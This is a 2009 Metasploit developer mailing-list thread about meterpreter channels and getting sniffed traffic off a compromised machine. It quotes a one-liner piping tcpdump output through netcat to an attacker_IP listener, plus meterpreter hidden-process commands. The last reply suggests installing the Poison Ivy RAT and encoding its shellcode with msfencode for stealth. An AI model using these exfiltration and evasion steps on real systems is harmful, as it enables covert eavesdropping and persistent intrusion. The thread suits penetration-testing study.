-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Bryan Richardson wrote: > Hi again Anastacios, > > Quick question... is there anything in the Metasploit Rex library that would > allow me to start up a listener similar to netcat directly in Metasploit? > This way, I could receive the results of my remote sniffing directly in my > program and analyze it in real time... > > Also, I've figured out how to access the channel created for an executed > process. Do you know of any way I could pipe output from a command I > execute on the compromised machine to the channel? For example, if I run > tcpdump on the compromised host, I can read the output of the command via > the channel. However, this output is not in pcap format. In order to get > it in pcap format, I have to use the '-w' option to write it to a file in > pcap format. I can tell '-w' to write the data in pcap format to stdin > using '-' as the value for '-w', then pipe stdin to something like netcat. > > In turn, I'd like to be able to either pipe the data to the channel, or pipe > it to netcat and hopefully use something in the Rex library to receive the > pcap data... > > What do you think? > > -- > Thanks! > Bryan > > 2009/2/9 Anastasios Monachos <anastasi...@gmail.com> > > 2009/2/9 Bryan Richardson <btri...@gmail.com> >>> Thanks Anastasios, >>> >>> So, am I correct in assuming this is how one is dumped into a Windows >>> shell after executing an exploit on a vulnerable Windows machine? >>> >> Bryan, if I am following you correctly, yes, using the download command >> supplied by meterpreter payload you can get a file from victim's machine to >> your machine. Note that in the case of windows you will have to escape the \ >> with an extra \ when(if) specifying the full path of the file's source and >> destination, obviously if you do "download file.txt file.txt" it will try to >> get the file from victim's current directory and save it to your current >> directory. >> >> >>> I was hoping that I could 'channelize' a traffic sniffer such that the >>> sniffed traffic would be sent back to me in real time for real time >>> analysis... it doesn't seem like this is the case. >>> >> I agree, real-time traffic in some environments really helps the whole task >> >> >> Ultimately, what would be cool is to have my real-time traffic analysis >>> software listening on a particular port and have some way of sending the >>> sniffed traffic from the compromised machine to that particular port on my >>> local machine. >>> >> I think it worths trying piping your live data through nc as we do with dd, >> but I am not sure if it will work in your case, oh you will have to let your >> nc traffic pass the firewall. >> >> For example: >> On victim you can try something like: tcpdump -e host victim_ip and port 23 >> | nc attacker_IP attacker_listening_port >> On attacker: nc -l -p attacker_listening_port | wireshark -i - >> Taken from wireshark's man >> " .... Pipe names should be either the name of a FIFO (named >> pipe) or >> ''-'' to read data from the standard input. Data read from >> pipes >> must be in standard libpcap format...." >> >> Last you may also play with the channel read/write options, so to pass nc's >> traffic through the channel (?), maybe someone else can reach more light >> here >> >> Let us know what worked and what didnt anyway >> >> Tasos >> >> >>> -- >>> Bryan >>> >>> On Mon, Feb 9, 2009 at 2:26 PM, Anastasios Monachos < >>> anastasi...@gmail.com> wrote: >>> >>>> 2009/2/9 Bryan Richardson <btri...@gmail.com> >>>> >>>> Hello All, >>>>> Would someone mind explaining to me what 'channelized' is and how it >>>>> works? >>>>> >>>> You can use "channelisation" in cases where you wish to work with >>>> multiple communication channels that will be tunnelled through one tcp/ip >>>> session. >>>> >>>> Channels are supported by the meterpreter payload, and to channelise you >>>> can do: >>>> >>>> meterpreter > execute -f cmd.exe -H -c //this will execute the file >>>> cmd.exe, it will hide the process window and it will channelise the task >>>> >>>> Process 1234 created. //this is output from meterpreter >>>> >>>> Channel 2 created.//this is output from meterpreter >>>> >>>> meterpreter > //now use meterpreter as usual to do your other stuff >>>> >>>> meterpreter > interact 2 //now interact with channelised cmd.exe >>>> >>>> >>>>> I'm wanting to try and use it to send sniffed traffic back to me from a >>>>> compromised machine that I upload a traffic sniffer to... >>>>> >>>> For already saved captured data you could use the upload/download >>>> commands (again from within meterpreter) >>>> >>>>> -- >>>>> Thanks! >>>>> Bryan >>>>> >>>>> _______________________________________________ >>>>> Framework-Hackers mailing list >>>>> Framework-Hackers@spool.metasploit.com >>>>> http://spool.metasploit.com/mailman/listinfo/framework-hackers >>>>> >>>>> >>>> -- >>>> AM >>>> >>> >> >> -- >> AM >> _______________________________________________ >> Framework-Hackers mailing list >> Framework-Hackers@spool.metasploit.com >> http://spool.metasploit.com/mailman/listinfo/framework-hackers >> >> > > > ------------------------------------------------------------------------ > > _______________________________________________ > Framework-Hackers mailing list > Framework-Hackers@spool.metasploit.com > http://spool.metasploit.com/mailman/listinfo/framework-hackers
Sorry if I misunderstood you. But as far as I can see, you're requesting for full control of hosts, so in that case, it may be a less painful solution to install a remote administration tool on the compromised host. For example, you could give a check to Poison Ivy (http://www.poisonivy-rat.com), generate a shellcode, encode it with msfencode to make it stealth, and then listen for the connection with the client. This tool will allow to sniff, set socks server, besides other features. I found useful some time ago - still I dropped it with time - to have such a shellcode integrated in msf payload/single, for customizing it's settings and automatic encoding. There are some things where metasploit isn't enough, or cases where it could be achieved less painfully as I said. Hope this helps. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFJlXieH+KgkfcIQ8cRAh25AKDOLJhSbO0g8Hg4GhIr3daWUr1qFwCfbsUV AA/6qggc8oeoKmoS2WcuIWo= =8cjp -----END PGP SIGNATURE----- _______________________________________________ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers
